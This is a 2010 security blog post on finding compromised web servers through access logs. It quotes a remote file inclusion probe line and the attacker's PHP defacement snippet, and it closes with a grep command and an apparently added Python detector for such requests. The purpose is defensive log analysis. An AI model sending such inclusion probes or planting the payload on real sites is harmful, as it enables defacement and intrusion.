Posted on Tuesday, 26th January 2010 by Michael

Using your web server logs to find compromised web servers

Some people use Google and the Google Hacking Database to find their targets, and others use their own servers to find potentially compromised boxes.

In this quick little update I am going to give you a basic idea of how to use your web server’s access logs to help find compromised hosts on the internet. I will be referencing Linux mostly, but the same concept would work on a Windows IIS server as well.

On my webhost I am running cPanel for site management / server management. cPanel provides the ability to access the raw logs through the portal. These raw logs are almost the same as the access_log you would find in a standard Apache setup on Linux. If you are running Windows, please refer to your IIS access logs and make sure they are configured with the proper options so you can see the requested URL.

The logs of your web server contain a lot of useful information. They can help you diagnose site and server issues, show the type of traffic you are getting (ideal for SEO and marketing), help pinpoint possible attacks against your sites, and provide a slew of other useful bits of information.

But we are going to use this article to discuss using them to find potential compromised hosts.

Let’s take a look at a sample log:

72.x.x.x - - [26/Jan/2010:04:36:31 -0600] "GET /feed/ HTTP/1.1" 304 - "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 5 subscribers; feed-id=16402550693898658203)"

76.12.124.76 - - [26/Jan/2010:04:40:38 -0600] "GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 301 - "-" "Mozilla/5.0"

76.12.124.76 - - [26/Jan/2010:04:40:38 -0600] "GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 403 82481 "-" "Mozilla/5.0"

193.x.x.x - - [26/Jan/2010:04:53:53 -0600] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"

72.x.x.x - - [26/Jan/2010:05:02:49 -0600] "GET /feed/ HTTP/1.1" 200 73246 "http://www.digitaloffensive.com/feed/" "Mozilla/5.0 (Compatible)"

77.x.x.x - - [26/Jan/2010:05:07:01 -0600] "GET /2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/insert_adhere_url_here HTTP/1.1" 404 10329 "-" "Yandex/1.01.001 (compatible; Win16; I)"

92.x.x.x - - [26/Jan/2010:05:30:12 -0600] "GET /2009/09/fun-with-poison-ivy/ HTTP/1.1" 200 18062 "http://www.google.com/search?hl=en&safe=off&q=poison+ivy+mutex&aq=f&aql=&aqi=&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"

As you can see above we have several different visitor types. There are several spiders / bots that came by the site as well as several visitors from search engines such as Google. Though the two entries we want to look at more closely are the ones that start with:

76.12.124.76 - - [26/Jan/2010:04:40:38 -0600]

This shows that access was attempted to the URL:

/?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt??.

In this attempt the attacker was trying to use the remote file inclusion attack that I mentioned above. If I Google the source IP, I find that it is a known malicious host used for automated scanning and distribution of malware. Though the part where it says DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? is why you guys are here. If you visit this URL directly you will see that the attacker uploaded the following defacement code (WARNING: going to these URLs may cause damage to your computer):

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Basically, when the remote file is included, this code runs on the vulnerable host and prints the attacker's tag, defacing the site. It then uses the PHP die() function to stop the rest of the page from loading, so only the tag is shown.

Now if we were malicious we could use Google or your favorite security site to research known vulnerabilities for osCommerce and compromise the site as well. You could also do additional research on the site to get more of an idea of how the attack was carried out and maybe even the version of the software they are running, be it osCommerce or something else like phpBB.

Though since we are good folks, we will contact the site owners and let them know about the compromise. We also blocked the source IP address.

If you want to quickly analyze your logs for things like this I would suggest using a little command line fu on your favorite Linux distribution. For example:

grep '\.txt' /var/log/httpd/access_log | grep -v robots.txt

This will display all the access attempts that contain .txt, excluding the requests for robots.txt. (The pattern is quoted so the shell does not expand *.txt against files in the current directory, and the option is a plain ASCII -v.)
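As an added example (not the article's own code), here is a Python version of the same log check. It parses Apache combined-format lines like the excerpt above, flags any request whose query parameter carries a remote URL (the RFI signature, whatever the file extension, so it generalizes the .txt grep while ignoring URLs in the Referer field), and lists the hosts that served the payload, which are the candidates for notification. The sample lines are copied from the log excerpt above; everything else is constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format; client is \S+ because the sample masks octets (72.x.x.x).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?:\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def rfi_candidates(entry):
    """(parameter, value) pairs whose value is an absolute URL: an RFI probe hands
    the target a URL so that a vulnerable include() fetches attacker-hosted code."""
    query = urlsplit(entry['path']).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(value)]

def scan(lines):
    """One (client, parameter, remote_url, status) tuple per RFI probe. Only the
    request line is inspected; a URL in the Referer is normal search traffic."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry:
            for name, url in rfi_candidates(entry):
                findings.append((entry['host'], name, url, entry['status']))
    return findings

def payload_hosts(findings):
    """Hosts serving the included payload: the likely compromised servers to notify."""
    return sorted({urlsplit(url).hostname for _, _, url, _ in findings})

# Constructed sample: four lines taken from the article's log excerpt.
SAMPLE_LOG = [
    '76.12.124.76 - - [26/Jan/2010:04:40:38 -0600] "GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 301 - "-" "Mozilla/5.0"',
    '76.12.124.76 - - [26/Jan/2010:04:40:38 -0600] "GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 403 82481 "-" "Mozilla/5.0"',
    '193.x.x.x - - [26/Jan/2010:04:53:53 -0600] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"',
    '92.x.x.x - - [26/Jan/2010:05:30:12 -0600] "GET /2009/09/fun-with-poison-ivy/ HTTP/1.1" 200 18062 "http://www.google.com/search?hl=en&safe=off&q=poison+ivy+mutex&aq=f&aql=&aqi=&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"',
]

if __name__ == '__main__':
    for client, param, url, status in scan(SAMPLE_LOG):
        print(f'{client} probed {param}={url} (HTTP {status})')
    print('payload hosts to notify:', payload_hosts(scan(SAMPLE_LOG)))
```

Point it at a real file with `scan(open('/var/log/httpd/access_log'))`; the robots.txt and Google-referer lines produce no findings, while both probes from 76.12.124.76 are reported with their status codes.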

As always I hope this provided you with some useful information. If you have any questions please feel free to let us know.

Posted in Papers | Comments (2)

2 Responses to “Using your web server logs to find compromised web servers”

  1. Website defaced, what can I do? Says:

    […] Using your web server logs to find compromised web servers at DigitalOffencive […]

  2. Website defaced, what can I do? - Admins Goodies Says:

    […] Using your web server logs to find compromised web servers at DigitalOffencive […]
